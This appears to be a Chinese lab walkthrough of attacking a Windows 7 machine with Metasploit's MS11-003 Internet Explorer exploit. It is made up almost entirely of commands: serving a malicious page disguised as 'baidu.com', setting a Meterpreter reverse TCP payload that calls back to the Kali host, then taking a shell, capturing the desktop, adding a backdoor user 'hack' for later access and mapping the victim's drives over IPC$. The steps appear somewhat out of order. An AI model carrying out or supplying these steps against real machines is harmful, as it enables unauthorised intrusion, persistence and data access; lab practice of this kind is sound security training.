目录
10、运行命令:sessions 列出所有会话,验证攻击是否成功。
12、电脑本体(win 10)打开cmd, 建立IPC$连接 运行命令:
kali 主机数据库是否开启
运行命令: service postgresql start
运行命令:service postgresql status
运行命令:msfconsole 命令,进入metasploit
运行命令:search ms11_003
运行命令:use exploit/windows/browser/ms11_003_ie_css_import
运行命令:show options 查看需要设置的参数
设置生成的恶意网页的URI为baidu.com
运行命令:set URIPATH baidu.com
为防止服务器端口冲突,设置服务器端口为8989,避开常用端口8080
运行命令:set SRVPORT 8989
设置服务器地址,服务器为kali地址。
运行命令:set SRVHOST 192.168.109.128
查看参数设置情况。
运行命令:show options
运行命令:set PAYLOAD windows/meterpreter/reverse_tcp
运行命令:show options 查看攻击负载参数
设置LHOST以绑定本地IP(Kali的IP地址)
运行命令: set LHOST 192.168.109.128
为避免冲突设置LPORT
运行命令:set LPORT 8866
开始进行攻击,生成恶意网页和做好其他准备,只等受害者访问我们构造的恶意网页
在 Win7靶机打开IE,
访问http://192.168.109.132:8989/baidu.com 模拟受害者误点击网页.
返回kali,等待漏洞注入。等待一分钟到三分钟。
键盘按【Ctrl】+【C】停止!!!
列出当前成功建立的回话,任意进入一个回话,查看攻击者的身份。
拿到对方shell权限,对方是管理员账号则获取对方电脑管理员权限。
Screenshot 截图对方桌面。
Shell 进入对方CMD。
Chcp 65001解决系统编码格式不一致导致的乱码。
net user hack 123456 /add 在windows 7上创建一个hack的用户,以便下次访问。
##其密码格式需符合密码策略。
net use \\192.168.100.129\ipc$ “1” /user:”administrator”
打开【我的电脑】找到【映射网络驱动器】
将靶机的磁盘映射到本地电脑
断开IPC$链接
运行命令: net use * /del